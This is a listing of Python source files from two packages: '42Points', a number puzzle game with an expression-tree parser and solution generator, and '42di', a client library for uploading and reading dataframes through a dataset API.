(8, 8, 8, 9, 10): 1,
(8, 8, 8, 9, 12): 2,
(8, 8, 8, 9, 13): 1,
(8, 8, 8, 10, 10): 2,
(8, 8, 8, 10, 11): 4,
(8, 8, 8, 10, 12): 3,
(8, 8, 8, 10, 13): 2,
(8, 8, 8, 11, 11): 1,
(8, 8, 8, 11, 12): 1,
(8, 8, 8, 11, 13): 1,
(8, 8, 8, 12, 12): 1,
(8, 8, 8, 12, 13): 1,
(8, 8, 9, 9, 11): 3,
(8, 8, 9, 9, 12): 1,
(8, 8, 9, 9, 13): 1,
(8, 8, 9, 10, 11): 4,
(8, 8, 9, 10, 12): 8,
(8, 8, 9, 10, 13): 3,
(8, 8, 9, 11, 11): 2,
(8, 8, 9, 11, 12): 1,
(8, 8, 9, 11, 13): 8,
(8, 8, 9, 12, 12): 3,
(8, 8, 9, 12, 13): 1,
(8, 8, 9, 13, 13): 1,
(8, 8, 10, 10, 10): 1,
(8, 8, 10, 10, 12): 5,
(8, 8, 10, 10, 13): 4,
(8, 8, 10, 11, 11): 1,
(8, 8, 10, 11, 12): 7,
(8, 8, 10, 11, 13): 3,
(8, 8, 10, 12, 12): 2,
(8, 8, 10, 12, 13): 8,
(8, 8, 10, 13, 13): 3,
(8, 8, 11, 11, 11): 1,
(8, 8, 11, 11, 13): 3,
(8, 8, 11, 13, 13): 2,
(8, 8, 12, 12, 12): 2,
(8, 8, 12, 12, 13): 1,
(8, 9, 9, 9, 12): 3,
(8, 9, 9, 9, 13): 1,
(8, 9, 9, 10, 11): 1,
(8, 9, 9, 10, 12): 5,
(8, 9, 9, 10, 13): 3,
(8, 9, 9, 11, 11): 1,
(8, 9, 9, 11, 12): 4,
(8, 9, 9, 11, 13): 4,
(8, 9, 9, 12, 12): 2,
(8, 9, 9, 12, 13): 7,
(8, 9, 10, 10, 10): 1,
(8, 9, 10, 10, 11): 3,
(8, 9, 10, 10, 12): 2,
(8, 9, 10, 10, 13): 4,
(8, 9, 10, 11, 11): 1,
(8, 9, 10, 11, 12): 4,
(8, 9, 10, 11, 13): 6,
(8, 9, 10, 12, 12): 12,
(8, 9, 10, 12, 13): 1,
(8, 9, 10, 13, 13): 3,
(8, 9, 11, 11, 11): 1,
(8, 9, 11, 11, 12): 5,
(8, 9, 11, 11, 13): 1,
(8, 9, 11, 12, 12): 6,
(8, 9, 11, 12, 13): 7,
(8, 9, 11, 13, 13): 3,
(8, 9, 12, 12, 13): 1,
(8, 10, 10, 10, 11): 1,
(8, 10, 10, 10, 12): 2,
(8, 10, 10, 10, 13): 1,
(8, 10, 10, 11, 11): 1,
(8, 10, 10, 11, 12): 4,
(8, 10, 10, 11, 13): 5,
(8, 10, 10, 12, 12): 3,
(8, 10, 10, 12, 13): 5,
(8, 10, 10, 13, 13): 1,
(8, 10, 11, 11, 13): 3,
(8, 10, 11, 12, 12): 4,
(8, 10, 11, 12, 13): 6,
(8, 10, 11, 13, 13): 5,
(8, 10, 12, 12, 12): 4,
(8, 10, 12, 12, 13): 1,
(8, 10, 12, 13, 13): 3,
(8, 10, 13, 13, 13): 1,
(8, 11, 11, 11, 13): 2,
(8, 11, 11, 12, 13): 3,
(8, 11, 11, 13, 13): 1,
(8, 11, 12, 12, 13): 5,
(8, 11, 12, 13, 13): 5,
(8, 11, 13, 13, 13): 3,
(8, 12, 12, 12, 12): 1,
(8, 12, 12, 12, 13): 2,
(8, 12, 12, 13, 13): 1,
(8, 13, 13, 13, 13): 1,
(9, 9, 9, 9, 12): 1,
(9, 9, 9, 10, 11): 1,
(9, 9, 9, 10, 12): 1,
(9, 9, 9, 11, 12): 3,
(9, 9, 9, 12, 12): 2,
(9, 9, 9, 12, 13): 4,
(9, 9, 10, 11, 12): 2,
(9, 9, 10, 11, 13): 4,
(9, 9, 10, 12, 12): 2,
(9, 9, 10, 12, 13): 4,
(9, 9, 10, 13, 13): 4,
(9, 9, 11, 11, 11): 1,
(9, 9, 11, 11, 12): 2,
(9, 9, 11, 11, 13): 2,
(9, 9, 11, 12, 12): 3,
(9, 9, 11, 12, 13): 4,
(9, 9, 11, 13, 13): 1,
(9, 9, 12, 12, 13): 1,
(9, 9, 12, 13, 13): 1,
(9, 9, 13, 13, 13): 1,
(9, 10, 10, 10, 12): 1,
(9, 10, 10, 11, 11): 2,
(9, 10, 10, 11, 12): 2,
(9, 10, 10, 12, 12): 1,
(9, 10, 10, 12, 13): 5,
(9, 10, 10, 13, 13): 1,
(9, 10, 11, 11, 11): 2,
(9, 10, 11, 11, 12): 2,
(9, 10, 11, 11, 13): 5,
(9, 10, 11, 12, 12): 3,
(9, 10, 11, 12, 13): 6,
(9, 10, 11, 13, 13): 3,
(9, 10, 12, 12, 12): 5,
(9, 10, 12, 12, 13): 3,
(9, 10, 12, 13, 13): 3,
(9, 10, 13, 13, 13): 1,
(9, 11, 11, 11, 12): 1,
(9, 11, 11, 11, 13): 1,
(9, 11, 11, 12, 13): 3,
(9, 11, 11, 13, 13): 2,
(9, 11, 12, 12, 13): 4,
(9, 12, 12, 12, 12): 1,
(9, 12, 12, 12, 13): 1,
(9, 12, 12, 13, 13): 3,
(9, 12, 13, 13, 13): 3,
(10, 10, 10, 10, 11): 1,
(10, 10, 10, 11, 12): 2,
(10, 10, 10, 12, 12): 1,
(10, 10, 10, 12, 13): 1,
(10, 10, 10, 13, 13): 1,
(10, 10, 11, 11, 12): 2,
(10, 10, 11, 11, 13): 1,
(10, 10, 11, 12, 13): 2,
(10, 10, 11, 13, 13): 1,
(10, 10, 12, 12, 13): 3,
(10, 10, 12, 13, 13): 2,
(10, 10, 13, 13, 13): 1,
(10, 11, 11, 11, 11): 1,
(10, 11, 11, 11, 13): 1,
(10, 11, 11, 12, 13): 2,
(10, 11, 11, 13, 13): 2,
(10, 11, 12, 12, 12): 2,
(10, 11, 12, 13, 13): 2,
(10, 11, 13, 13, 13): 2,
(10, 12, 12, 12, 13): 1,
(10, 12, 12, 13, 13): 1,
(10, 12, 13, 13, 13): 1,
(10, 13, 13, 13, 13): 2
} | 42Points | /42Points-1.2.7-py3-none-any.whl/ftptsgame/database.py | database.py |
import datetime
from .expr_utils import Node, build_node
from .problem_utils import Problem
class FTPtsGame(object):
"""
The main game.
Available methods (+ means playing, - means not playing):
__init__(): initialization. (Entry point)
is_playing(): show the status of current game. (+-)
generate_problem(): generate a problem manually. (-)
get_elapsed_time(): get the time elapsed during the game. (+)
get_current_problem(): get current problem (tuple). (+)
get_current_solutions(): get current solutions (list). (+)
get_current_solution_number(): print current solution number. (+)
get_total_solution_number(): print total solution number. (+)
start(): start the game. (-)
stop(): stop the game. (+)
solve(): put forward a solution and show solution intervals. (+)
"""
def __init__(self):
"""Start the game session, serving as an initialization."""
self.__valid = [] # this list stores readable answers
self.__formula = [] # this list stores converted formulas
self.__players = [] # this list stores player statistics
self.__playing = False # this stores playing status
def __status_check(self, required_status: bool = True):
"""A status checker."""
if required_status != self.is_playing():
raise PermissionError('Required status: %s' % required_status)
def is_playing(self) -> bool:
"""Indicate the game is started or not."""
return self.__playing
def get_elapsed_time(self) -> datetime.timedelta:
"""Get elapsed time between solutions. Effective when playing."""
self.__status_check(required_status=True)
elapsed = datetime.datetime.now() - self.__timer
return elapsed
def generate_problem(self, problem, target=42):
"""Generate a problem manually."""
self.__status_check(required_status=False)
self.__target = target
self.__problem = tuple(sorted(problem))
self.__problem_class = Problem(list(self.__problem))
self.__problem_class.generate_answers(self.__target)
if len(self.__problem_class.distinct_answer_table) == 0:
raise ValueError('No solution found.')
def get_current_target(self) -> int:
"""Get current target. Effective when playing."""
self.__status_check(required_status=True)
return self.__target
def get_current_problem(self) -> tuple:
"""Get current problem. Effective when playing."""
self.__status_check(required_status=True)
return self.__problem
def get_current_solutions(self) -> list:
"""Get current valid solutions. Effective when playing."""
self.__status_check(required_status=True)
return self.__valid
def get_current_solution_number(self) -> int:
"""Get the number of current solutions. Effective when playing."""
self.__status_check(required_status=True)
return len(self.__valid)
def get_total_solution_number(self) -> int:
"""Get the number of total solutions. Effective when playing."""
self.__status_check(required_status=True)
return len(self.__problem_class.distinct_answer_table)
def get_remaining_solutions(self) -> list:
"""Get remaining solutions. Effective when playing."""
self.__status_check(required_status=True)
current_solution_set = set()
for expr_str in self.__valid:
node = build_node(expr_str)
current_solution_set.add(self.__problem_class.equivalence_dict[node.unique_id()])
return_list = []
for expr in self.__problem_class.distinct_answer_table:
if self.__problem_class.equivalence_dict[expr.unique_id()] not in current_solution_set:
return_list.append(str(expr))
return return_list
def get_current_player_statistics(self) -> list:
"""Get current player statistics. Effective when playing."""
self.__status_check(required_status=True)
return self.__players
def __validate_repeated(self, node: Node):
"""Validate distinguishing expressions. Private method."""
class_id = self.__problem_class.equivalence_dict[node.unique_id()]
for ind in range(0, len(self.__formula)):
cmp_node = self.__formula[ind]
cmp_class_id = self.__problem_class.equivalence_dict[cmp_node.unique_id()]
if cmp_class_id == class_id:
raise LookupError(self.__valid[ind])
def solve(self, math_expr: str, player_id: int = -1) -> datetime.timedelta:
"""Put forward a solution and show solution intervals if correct."""
self.__status_check(required_status=True)
replace_table = [
('×', '*'),
('x', '*'),
('÷', '/'),
(' ', ''),
('\n', ''),
('\r', ''),
('(', '('),
(')', ')'),
]
for src, dest in replace_table:
math_expr = math_expr.replace(src, dest)
if len(math_expr) >= 30:
raise OverflowError('Maximum parsing length exceeded.')
node = build_node(math_expr)
user_input_numbers = node.extract()
if tuple(sorted(user_input_numbers)) != self.__problem:
raise ValueError('Unmatched input numbers.')
math_expr_value = node.evaluate()
if math_expr_value != self.__target:
raise ArithmeticError(str(math_expr_value))
self.__validate_repeated(node)
self.__formula.append(node)
self.__valid.append(math_expr)
elapsed = self.get_elapsed_time()
interval = elapsed - self.__last
self.__last = elapsed
self.__players.append((player_id, interval))
return interval
def start(self):
"""Start the game. Effective when not playing."""
self.__status_check(required_status=False)
self.__valid = []
self.__formula = []
self.__players = []
self.__timer = datetime.datetime.now()
self.__last = datetime.timedelta(seconds=0) # A tag for each solution.
self.__playing = True
def stop(self) -> datetime.timedelta:
"""Stop the game. Effective when playing."""
self.__status_check(required_status=True)
elapsed = self.get_elapsed_time()
self.__playing = False
return elapsed | 42Points | /42Points-1.2.7-py3-none-any.whl/ftptsgame/__init__.py | __init__.py |
import ast
import itertools
from copy import deepcopy
from fractions import Fraction
class Node(object):
"""An expression tree."""
NODE_TYPE_NUMBER = 0
NODE_TYPE_OPERATOR = 1
def __init__(self, _type=NODE_TYPE_NUMBER, ch=None, left=None, right=None):
"""Initialize the node."""
self.type = _type
self.left = left
self.right = right
if self.type == Node.NODE_TYPE_OPERATOR:
self.value = Node.operation(ch, self.left.value, self.right.value)
self.ch = ch
else:
self.value = int(ch)
self.ch = '#'
@staticmethod
def operation(opt, x, y):
"""Basic arithmetic operation between two numbers."""
if opt == '/' and y == 0:
raise ArithmeticError('x/0')
operation_list = {
'+': lambda x, y: x + y,
'-': lambda x, y: x - y,
'*': lambda x, y: x * y,
'/': lambda x, y: Fraction(x, y)
}
return operation_list[opt](x, y)
def node_list(self) -> list:
"""Get the list of a node."""
if self.type == Node.NODE_TYPE_OPERATOR:
return self.left.node_list() + [self] + self.right.node_list()
else:
return [self]
def unique_id(self) -> str:
"""Return the unique id (postfix) of this expression."""
if self.type == Node.NODE_TYPE_OPERATOR:
return self.ch + self.left.unique_id() + self.right.unique_id()
else:
return '[' + str(self.value) + ']'
def __repr__(self) -> str:
"""Return the string form of this expression."""
if self.type != Node.NODE_TYPE_OPERATOR:
return str(self.value)
deal_l = self.ch in '*/' and self.left.ch in '+-'
deal_r = (self.ch in '-*/' and self.right.ch in '+-') or (self.ch == '/' and self.right.ch in '*/')
left_string = '(' * deal_l + repr(self.left) + ')' * deal_l
right_string = '(' * deal_r + repr(self.right) + ')' * deal_r
return left_string + self.ch + right_string
def evaluate(self, values: dict = None) -> Fraction:
"""Evaluate the value of this expression using substitution."""
if values is None:
return self.value
if self.type == Node.NODE_TYPE_OPERATOR:
return Node.operation(self.ch, self.left.evaluate(values), self.right.evaluate(values))
else:
return Fraction(values[int(self.value)])
def extract(self) -> list:
"""Extract numbers from the node."""
if self.type == Node.NODE_TYPE_OPERATOR:
return self.left.extract() + self.right.extract()
else:
return [int(self.value)]
def reduce_negative_number(self):
"""
Make all intermediate results of this expression not be negative.
The result of whole expression will become its absolute value.
"""
def _neg(v1: Fraction, v2: Fraction) -> Fraction:
return v1 * (1 - 2 * (v2 < 0))
if self.type != Node.NODE_TYPE_OPERATOR:
return self.value
left_value = self.left.reduce_negative_number()
right_value = self.right.reduce_negative_number()
return_value = Node.operation(self.ch, left_value, right_value)
if self.ch not in '+-':
self.value = abs(return_value)
return return_value
char_map = {'+': 1, '-': -1, 1: '+', -1: '-'}
left_opt = 1
right_opt = char_map[self.ch]
left_opt = _neg(left_opt, left_value)
left_value = _neg(left_value, left_value)
right_opt = _neg(right_opt, right_value)
right_value = _neg(right_opt, right_value)
left_opt = _neg(left_opt, return_value)
right_opt = _neg(right_opt, return_value)
if left_opt == 1:
self.ch = char_map[right_opt]
else:
self.ch = '-'
self.left, self.right = self.right, self.left
self.value = abs(return_value)
return return_value
def all_equivalent_expression(self):
"""
Return the list of all equivalent expression of an expression.
Rule 1 (equivalence by identical equation) is not considered.
If expression A induces expression B, B may not induce A.
"""
if self.type != Node.NODE_TYPE_OPERATOR:
return
left_equal_list = self.left.all_equivalent_expression()
right_equal_list = self.right.all_equivalent_expression()
left_value, right_value = self.left.value, self.right.value
for new_left in left_equal_list:
yield Node(Node.NODE_TYPE_OPERATOR, self.ch, new_left, self.right)
for new_right in right_equal_list:
yield Node(Node.NODE_TYPE_OPERATOR, self.ch, self.left, new_right)
# Rule 2: x-0 --> x+0
# x/1 --> x*1
# 0/x --> 0*x
if self.ch == '-' and right_value == 0:
yield Node(Node.NODE_TYPE_OPERATOR, '+', self.left, self.right)
if self.ch == '/' and right_value == 1:
yield Node(Node.NODE_TYPE_OPERATOR, '*', self.left, self.right)
if self.ch == '/' and left_value == 0:
yield Node(Node.NODE_TYPE_OPERATOR, '*', self.left, self.right)
# Rule 3: (x?y)+0 --> (x+0)?y, x?(y+0)
# (x?y)*1 --> (x*1)?y, x?(y*1)
if ((self.ch == '+' and right_value == 0) or
(self.ch == '*' and right_value == 1)) \
and self.left.type == Node.NODE_TYPE_OPERATOR:
yield Node(Node.NODE_TYPE_OPERATOR, self.left.ch, Node(Node.NODE_TYPE_OPERATOR, self.ch, self.left.left,
self.right), self.left.right)
yield Node(Node.NODE_TYPE_OPERATOR, self.left.ch, self.left.left,
Node(Node.NODE_TYPE_OPERATOR, self.ch, self.left.right, self.right))
# Rule 4: (y+z)/x --> (x-y)/z, (x-z)/y when x=y+z
if self.ch == '/' and self.left.ch == '+' and \
left_value == right_value and \
self.left.left.value != 0 and self.left.right.value != 0:
yield Node(Node.NODE_TYPE_OPERATOR, '/', Node(Node.NODE_TYPE_OPERATOR, '-', self.right, self.left.left),
self.left.right)
yield Node(Node.NODE_TYPE_OPERATOR, '/', Node(Node.NODE_TYPE_OPERATOR, '-', self.right, self.left.right),
self.left.left)
# Rule 5: x*(y/y) --> x+(y-y)
if self.ch == '*' and self.right.ch == '/' and right_value == 1:
yield Node(Node.NODE_TYPE_OPERATOR, '+', self.left,
Node(Node.NODE_TYPE_OPERATOR, '-', self.right.left, self.right.right))
# Rule 6: x_1/x_2 --> x_2/x_1
if self.ch == '/' and left_value == right_value:
yield Node(Node.NODE_TYPE_OPERATOR, '/', self.right, self.left)
# Rule 7: Changing two sub-expressions which have the same result
# doesn't change the equivalence class of this expression.
left_node_list = self.left.node_list()
right_node_list = self.right.node_list()
for nl, nr in itertools.product(left_node_list, right_node_list):
if nl.value == nr.value:
nl.type, nl.left, nl.right, nl.ch, nl.value, \
nr.type, nr.left, nr.right, nr.ch, nr.value = \
nr.type, nr.left, nr.right, nr.ch, nr.value, \
nl.type, nl.left, nl.right, nl.ch, nl.value
yield deepcopy(self)
nl.type, nl.left, nl.right, nl.ch, nl.value, \
nr.type, nr.left, nr.right, nr.ch, nr.value = \
nr.type, nr.left, nr.right, nr.ch, nr.value, \
nl.type, nl.left, nl.right, nl.ch, nl.value
# Rule 8: 2*2 --> 2+2
# 4/2 --> 4-2
if self.ch == '*' and left_value == 2 and right_value == 2:
yield Node(Node.NODE_TYPE_OPERATOR, '+', self.left, self.right)
if self.ch == '/' and left_value == 4 and right_value == 2:
yield Node(Node.NODE_TYPE_OPERATOR, '-', self.left, self.right)
def unique_id_for_rule_1(self, values_list: list) -> tuple:
"""
Return the unique id of this expression.
Two expressions is equivalent by rule 1 iff they have the same id.
"""
results = [self.evaluate(values) for values in values_list]
return tuple(results)
def _build_node(node) -> Node:
"""Convert an AST node to an expression node."""
node_ref = {type(ast.Add()): '+', type(ast.Sub()): '-', type(ast.Mult()): '*', type(ast.Div()): '/'}
if isinstance(node, ast.BinOp) and type(node.op) in node_ref:
built_node = Node(_type=Node.NODE_TYPE_OPERATOR,
ch=node_ref[type(node.op)],
left=_build_node(node.left),
right=_build_node(node.right))
elif isinstance(node, ast.Num) and type(node.n) is int:
built_node = Node(_type=Node.NODE_TYPE_NUMBER, ch=node.n)
else:
raise SyntaxError('Unallowed operator or operands.')
return built_node
def build_node(token: str) -> Node:
"""Convert a token/string to an AST node."""
token_ast = ast.parse(token, mode='eval').body
node = _build_node(token_ast)
node.reduce_negative_number()
return node | 42Points | /42Points-1.2.7-py3-none-any.whl/ftptsgame/expr_utils.py | expr_utils.py |
import random
import itertools
from .expr_utils import Node
class Problem(object):
"""A 42-points problem."""
def __init__(self, problem):
"""Initialize the problem."""
self.problem = sorted(problem)
self.answer_table = []
self.distinct_answer_table = []
self.equivalence_dict = {}
self.__parent = {}
self.__rank = {}
def __root(self, uid):
"""Method for union set."""
if self.__parent[uid] == uid:
return uid
else:
self.__parent[uid] = self.__root(self.__parent[uid])
return self.__parent[uid]
def __union(self, uid1, uid2):
"""Method for union set."""
uid1 = self.__root(uid1)
uid2 = self.__root(uid2)
if uid1 != uid2:
if self.__rank[uid1] <= self.__rank[uid2]:
self.__parent[uid1] = uid2
self.__rank[uid2] += (self.__rank[uid1] == self.__rank[uid2])
else:
self.__parent[uid2] = uid1
def __classify(self, target):
"""
Divide all answers into some equivalence classes.
Returns:
1. A list including all answers (as expression trees);
2. A dictionary, for any answer expression save the representative
expression of its class (as the unique id of expressions).
"""
values_list = []
n = len(self.problem)
dif = list(set(self.problem)) # different numbers of the problem
for _ in range(10):
numbers = random.sample(range(500000, 1000000), len(dif))
values = {dif[i]: numbers[i] for i in range(len(dif))}
values[0], values[1] = 0, 1
values_list.append(values)
answers = _get_all_expr(self.problem, n, target)
uid_table, uid_r1_table = {}, {}
for expr in answers:
uid = expr.unique_id()
uid_table[uid] = expr
uid_r1 = expr.unique_id_for_rule_1(values_list)
if uid_r1 in uid_r1_table:
self.__parent[uid] = uid_r1_table[uid_r1]
self.__rank[uid] = 1
else:
self.__parent[uid] = uid
uid_r1_table[uid_r1] = uid
self.__rank[uid] = 2
for expr in answers:
uid1 = expr.unique_id()
for expr2 in expr.all_equivalent_expression():
uid2 = expr2.unique_id()
self.__union(uid1, uid2)
return_dict = {}
for expr in answers:
uid = expr.unique_id()
return_dict[uid] = self.__root(uid)
return answers, return_dict
def generate_answers(self, target: int = 42):
"""Generate all answers divided into equivalence classes."""
self.answer_table, self.equivalence_dict = self.__classify(target)
self.distinct_answer_table = []
for expr in self.answer_table:
uid = expr.unique_id()
if self.equivalence_dict[uid] == uid:
self.distinct_answer_table.append(expr)
def _combine_expr(left_set: list, right_set: list):
"""Combine two node sets to a single node set with different operators."""
for left_expr, right_expr in itertools.product(left_set, right_set):
yield Node(Node.NODE_TYPE_OPERATOR, '+', left_expr, right_expr)
yield Node(Node.NODE_TYPE_OPERATOR, '*', left_expr, right_expr)
if left_expr.value >= right_expr.value:
yield Node(Node.NODE_TYPE_OPERATOR, '-', left_expr, right_expr)
if right_expr.value != 0:
yield Node(Node.NODE_TYPE_OPERATOR, '/', left_expr, right_expr)
def _get_all_expr(problem: list, length: int, target: int) -> list:
"""Return the list of all possible expressions of a problem."""
n = len(problem)
if n == 1:
return [Node(Node.NODE_TYPE_NUMBER, problem[0])]
return_list = []
unique_id_set = set()
for mask in itertools.filterfalse(lambda x: sum(x) == 0 or sum(x) == n, itertools.product([0, 1], repeat=n)):
left_prob, right_prob = [], []
for i in range(n):
left_prob.append(problem[i]) if mask[i] == 0 \
else right_prob.append(problem[i])
left_set = _get_all_expr(left_prob, length, target)
right_set = _get_all_expr(right_prob, length, target)
for expr in itertools.filterfalse(lambda x: x.value != target and n == length, _combine_expr(left_set, right_set)):
expr_id = expr.unique_id()
if expr_id not in unique_id_set:
return_list.append(expr)
unique_id_set.add(expr_id)
return return_list | 42Points | /42Points-1.2.7-py3-none-any.whl/ftptsgame/problem_utils.py | problem_utils.py |
from logging import error
import requests
from requests import status_codes
import swagger_client as sw
import json
import pandas
import warnings
from enum import Enum
#warnings.filterwarnings('default')
SSL = True
TOKEN = None
class ResourceType(Enum):
INVALID = 0
TEAM = 1
PROJECT = 2
DATASET = 3
FILE = 4
class ResourceId():
def __init__(self, uri):
self.endpoint = None
self.team_id = None
self.project_id = None
self.dataset_id = None
self.file_name = None
self._parse_uri(uri)
def _parse_uri(self, uri):
if not uri:
return
s = uri.strip().split('/')
length = len(s)
if length < 1 or length > 5:
raise ValueError("invalid ResourceId: %s" % uri)
if length > 0:
self.endpoint = s[0]
if length > 1:
self.team_id = s[1]
if length > 2:
self.project_id = s[2]
if length > 3:
self.dataset_id = s[3]
if length > 4:
self.file_name = s[4]
def resource_type(self):
if self.file_name:
return ResourceType.FILE
elif self.dataset_id:
return ResourceType.DATASET
elif self.project_id:
return ResourceType.PROJECT
elif self.team_id:
return ResourceType.TEAM
else:
return ResourceType.INVALID
def team_resource_id(self):
if self.endpoint and self.team_id:
return '/'.join([self.endpoint, self.team_id])
else:
return None
def project_resource_id(self):
if self.endpoint and self.team_id and self.project_id:
return '/'.join([self.endpoint, self.team_id, self.project_id])
else:
return None
def dataset_resource_id(self):
if self.endpoint and self.team_id and self.project_id and self.dataset_id:
return '/'.join([self.endpoint, self.team_id, self.project_id, self.dataset_id])
else:
return None
def file_resource_id(self):
if self.endpoint and self.team_id and self.project_id and self.dataset_id and self.file_name:
return '/'.join([self.endpoint, self.team_id, self.project_id, self.dataset_id, self.file_name])
else:
return None
def __str__(self):
resource_type = self.resource_type()
if resource_type == ResourceType.TEAM:
return self.team_resource_id()
elif resource_type == ResourceType.PROJECT:
return self.project_resource_id()
elif resource_type == ResourceType.DATASET:
return self.dataset_resource_id()
elif resource_type == ResourceType.FILE:
return self.file_resource_id()
else:
return None
def str(self):
return self.__str__()
def _create_sw_client(host, token):
cfg = sw.Configuration()
#cfg.api_key["token"] = token
scheme = "https://" if SSL else "http://"
cfg.host = scheme + host + "/api/v1"
return sw.ApiClient(cfg, "Authorization", "Bearer " + token)
class Project():
def __init__(self, project, access_token=None):
global SSL
global TOKEN
ri = ResourceId(project)
if not ri.project_resource_id():
raise ValueError("invalid project resource identity: %s" % project)
self.host = ri.endpoint
self.team_id = ri.team_id
self.project_id = ri.project_id
self.access_token = access_token
if not self.access_token:
self.access_token = TOKEN
if not self.access_token:
raise ValueError("access token required.")
self.sw_client = _create_sw_client(self.host, self.access_token)
def dataset(self, dataset_id):
return Dataset(self.team_id, self.project_id, dataset_id, self.sw_client, self.access_token)
def list_datasets(self):
return self.dataset(None).list()
# Deprecated
def table(self, table_name):
warnings.warn("Deprecated, use dataset instead.", DeprecationWarning)
return self.dataset(table_name)
def list_tables(self):
warnings.warn("Deprecated, use list_datasets instead.", DeprecationWarning)
return self.list_datasets()
class Dataset():
def __init__(self, team_id, project_id, dataset_id, sw_client, token=None):
self.team_id = team_id
self.project_id = project_id
self.dataset_id = dataset_id
self.sw_client = sw_client
self.api = sw.DatasetsApi(self.sw_client)
self.token = token
def list(self):
try:
return self.api.list_datasets(self.team_id, self.project_id)
except sw.rest.ApiException as e:
_err_format(e)
def get(self, get_schema=False):
t = None
try:
t = self.api.get_dataset(self.team_id, self.project_id, self.dataset_id, schema=get_schema)
except sw.rest.ApiException as e:
if e.status != 404:
_err_format(e)
return t
def exists(self):
return self.get() is not None
def create(self):
try:
self.api.update_dataset(self.team_id, self.project_id, self.dataset_id)
except sw.rest.ApiException as e:
_err_format(e)
def delete(self):
try:
self.api.delete_dataset(self.team_id, self.project_id, self.dataset_id)
except sw.rest.ApiException as e:
_err_format(e)
def update(self, prop, value):
action = sw.PatchAction(action="UPDATE", _property=prop, value=value)
try:
self.api.update_dataset_property(self.team_id, self.project_id, self.dataset_id, body=action)
except sw.rest.ApiException as e:
_err_format(e)
def update_schema(self, schema):
self.update("schema", json.dumps(schema));
def put(self, data, file_name=None, tag=None, content_type=None):
if file_name is None or file_name.strip() == "":
file_name = "0"
if tag is None:
tag = ""
if content_type is None or content_type.strip() == "":
content_type = ""
try:
self.api.put_dataset_data_file(self.team_id, self.project_id, self.dataset_id, file_name , x_di_tag=tag, content_type=content_type, body=data)
except sw.rest.ApiException as e:
_err_format(e)
def put_csv(self, df, file_name=None, tag=None):
body = df.to_csv()
self.put(body, file_name, tag, "text/csv")
def put_parquet(self, df, file_name=None, tag=None):
body = df.to_parquet()
self.put(body, file_name, tag, "application/parquet")
def files(self):
try:
return self.api.list_dataset_data_files(self.team_id, self.project_id, self.dataset_id)
except sw.rest.ApiException as e:
_err_format(e)
def get_file_meta(self, data_file_name):
try:
return self.api.get_dataset_data_file_meta(self.team_id, self.project_id, self.dataset_id, data_file_name)
except sw.rest.ApiException as e:
_err_format(e)
def _get_file_url(self, file_name):
url = '/'.join([self.sw_client.configuration.host, "teams", self.team_id, "projects", self.project_id, "datasets", self.dataset_id, "data", file_name])
if self.token:
url += "?token=" + self.token
r = requests.get(url, allow_redirects=False)
if r.status_code == 303:
return r.headers.get('Location')
else:
raise BaseException("Get DataFile content failed: %s" % str(r.status_code))
def _read_df(self, file_name, format):
url = self._get_file_url(file_name)
if url and format == "text/csv":
return pandas.read_csv(url)
elif format == "application/parquet":
return pandas.read_parquet(url)
else:
raise BaseException("File format unsupported.")
def read(self, file_name=[]):
filters = set(file_name)
dfs = []
files = self.files()
for f in files:
if len(file_name) > 0 and f.name not in filters:
continue
df = self._read_df(f.name, f.content_type)
dfs.append(df)
return None if len(dfs) == 0 else pandas.concat(dfs)
def Table(Dataset):
def __init__(self, team_id, project_id, table_name, sw_client, token=None):
Dataset.__init__(team_id, project_id, table_name, sw_client, token)
warnings.warn("Deprecated, use Dataset instead.", DeprecationWarning)
def schema(df):
columns = []
for name in df.index.names:
columns.append({
"name": name,
"data_type": str(df.index.dtype),
"key": "index"
})
for index, value in df.dtypes.items():
columns.append({
"name": index,
"data_type": str(value)
})
return {"columns": columns}
def dataset(identity, token=None):
ri = ResourceId(str(identity))
if ri.resource_type() != ResourceType.DATASET:
raise ValueError("invalid resource id: %s" % identity)
return Project(ri.project_resource_id(), access_token=token).dataset(ri.dataset_id)
def put(identity, data, token=None, content_type='application/parquet', create=True, update_schema=False):
ri = ResourceId(str(identity))
if ri.resource_type() != ResourceType.DATASET and ri.resource_type() != ResourceType.FILE:
raise ValueError("invalid resource id: %s" % identity)
project = Project(ri.project_resource_id(), token)
dataset = project.dataset(ri.dataset_id)
if not dataset.exists() and create:
dataset.create()
if content_type == 'text/csv':
dataset.put_csv(data, ri.file_name)
elif content_type == 'application/parquet':
dataset.put_parquet(data, ri.file_name)
else:
dataset.put(data, file_name=ri.file_name, tag=None, content_type=content_type)
if update_schema:
dataset.update_schema(schema(data))
def read(identity, token=None):
ri = ResourceId(str(identity))
if ri.resource_type() != ResourceType.DATASET and ri.resource_type() != ResourceType.FILE:
raise ValueError("invalid resource id: %s" % identity)
project = Project(ri.project_resource_id(), token)
files = []
if ri.file_name:
files.append(ri.file_name)
return project.dataset(ri.dataset_id).read(file_name=files)
class DIException(Exception):
def __init__(self, status, code, msg):
self.status = status
self.code = code
self.msg = msg
Exception.__init__(self, self.status, "HTTP Status: %s, Code: %s, Message: %s" % (self.status, self.code, self.msg))
def _err_format(e):
err = {}
try:
err = json.loads(e.body)
except json.decoder.JSONDecodeError as je:
err = {"code": "JSONDecodeError", "message": je}
raise DIException(e.status, err["code"], err["message"]) from None | 42di | /42di-0.2.6.tar.gz/42di-0.2.6/di/__init__.py | __init__.py |
from __future__ import absolute_import
import datetime
import json
import mimetypes
from multiprocessing.pool import ThreadPool
import os
import re
import tempfile
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import quote
from swagger_client.configuration import Configuration
import swagger_client.models
from swagger_client import rest
class ApiClient(object):
"""Generic API client for Swagger client library builds.
Swagger generic API client. This client handles the client-
server communication, and is invariant across implementations. Specifics of
the methods and models for each application are generated from the Swagger
templates.
NOTE: This class is auto generated by the swagger code generator program.
Ref: https://github.com/swagger-api/swagger-codegen
Do not edit the class manually.
:param configuration: .Configuration object for this client
:param header_name: a header to pass when making calls to the API.
:param header_value: a header value to pass when making calls to
the API.
:param cookie: a cookie to include in the header when making calls
to the API
"""
PRIMITIVE_TYPES = (float, bool, bytes, six.text_type) + six.integer_types
NATIVE_TYPES_MAPPING = {
'int': int,
'long': int if six.PY3 else long, # noqa: F821
'float': float,
'str': str,
'bool': bool,
'date': datetime.date,
'datetime': datetime.datetime,
'object': object,
}
def __init__(self, configuration=None, header_name=None, header_value=None,
cookie=None):
if configuration is None:
configuration = Configuration()
self.configuration = configuration
self.pool = ThreadPool()
self.rest_client = rest.RESTClientObject(configuration)
self.default_headers = {}
if header_name is not None:
self.default_headers[header_name] = header_value
self.cookie = cookie
